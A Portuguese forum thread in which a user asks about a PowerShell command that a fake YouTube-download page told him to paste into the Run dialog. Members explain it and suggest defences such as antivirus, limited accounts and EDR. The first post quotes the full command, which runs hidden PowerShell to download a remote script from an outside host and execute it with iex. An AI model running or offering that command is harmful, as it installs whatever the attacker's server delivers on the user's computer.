Ir ao conteúdo

Posts recomendados

Postado

Boa noite,

 

     Gostaria de saber qual a finalidade desse comando no PowerShell?

 

powershell.exe -W Hidden -command  $uR='https://efr-du.com/nones/vasih.txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t

 

     Tinha copiado o link de um vídeo no youtube e colado em outro e abriu outra aba transparente com essa sequência de comandos usando as teclas para executar...dando a entender que, se não executasse os comandos não seria possível efetuar o download do vídeo.

 

1º- Windows+R

2º- Ctrl+v

3º- Enter

 

é claro q não executei a 3ª parte, apenas copiei o comando.

 

Att,

Francisco

Postado

@geluka10 powershell.exe -W Hidden: Esse comando executa o PowerShell com a janela oculta (-W Hidden), ou seja, o processo não fica visível para o usuário enquanto está rodando.

$uR='https://efr-du.com/nones/vasih.txt': O comando define uma variável chamada $uR com a URL para um arquivo de texto que parece estar hospedado na internet. Esse arquivo pode ser um script malicioso.

$reS=Invoke-WebRequest -Uri $uR -UseBasicParsing: Aqui, o PowerShell faz uma requisição HTTP para o endereço especificado na variável $uR e baixa o conteúdo do arquivo (que é o que está no link mencionado).

$t=$reS.Content: A variável $t armazena o conteúdo retornado pela requisição, ou seja, o script malicioso que foi baixado.

iex $t: O comando iex (Invoke-Expression) executa o conteúdo armazenado em $t, que, no caso, é um script que foi baixado da internet. Isso significa que, se o link fornecido apontar para um script malicioso, ele será executado no seu computador sem que você perceba.

  • Curtir 2
  • Amei 2
  • Membro VIP
Postado

Um bom antivírus + antimalware deve ser capaz de fazer o bloqueio.

 

Outra forma de mitigação é limitar os poderes de usuário da conta, e deixar a conta de Administrador restrita à apenas quem precisa ter.

 

Se o malware não precisar de nível "admin" para ser executado, mas necessitar de acesso ao PowerShell por exemplo, pode também limitar acesso aos usuários à este programa usando o "Controle de Aplicativos e de Navegador" do Windows.

 

Não muito comum/conhecido mas soluções EDR (Endpoint Detection & Response) são mais comuns em ambientes corporativos, embora existam soluções gratuitas como o Kaspersky Endpoint Detection and Response Optimum e o OpenEDR by Comodo e adicionam uma camada de segurança excelente.

  • Curtir 1
  • Obrigado 1
Postado

@Linio Alan uma conta de usuário limitada impede de executar o PowerShell? Já vi especialistas falando que a conta de usuário limita ajuda muito pouco. Porém no Linux o usuario não fica com acesso de admistrador o tempo todo.

 

Qual a diferença então de uma conta de usuário limitada no no Linux e até mesmo no Android para o Windows? A força da senha de admin conta ou uma senha de 4 caracters já ajudaria a impedir infecções e ataques ao computador?

  • Membro VIP
Postado

Todas as configurações de segurança derivadas da revogação do nível de privilégio de uma conta por certo dificultam qualquer incursão maliciosa.

 

Se isso mitiga perfeitamente 100% de vulnerabilidades: não! mas certamente não as facilitam pelo contrário, e o PowerShell nesse contexto é apenas uma das várias outras vertentes que, no contexto do autor do tópico, o script malicioso está invocando explicitamente para se executar, a limitação de acesso à ele limitaria o poder do exploit ao menos em um primeiro momento.

 

Android, Linux e Windows possuem cada um suas particularidades quanto ao gerenciamento de contas de sistema, sugiro a pesquisa sobre System Hardening.

  • Curtir 1

Crie uma conta ou entre para comentar

Você precisa ser um usuário para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar agora

Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas comunidades sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

×
×
  • Criar novo...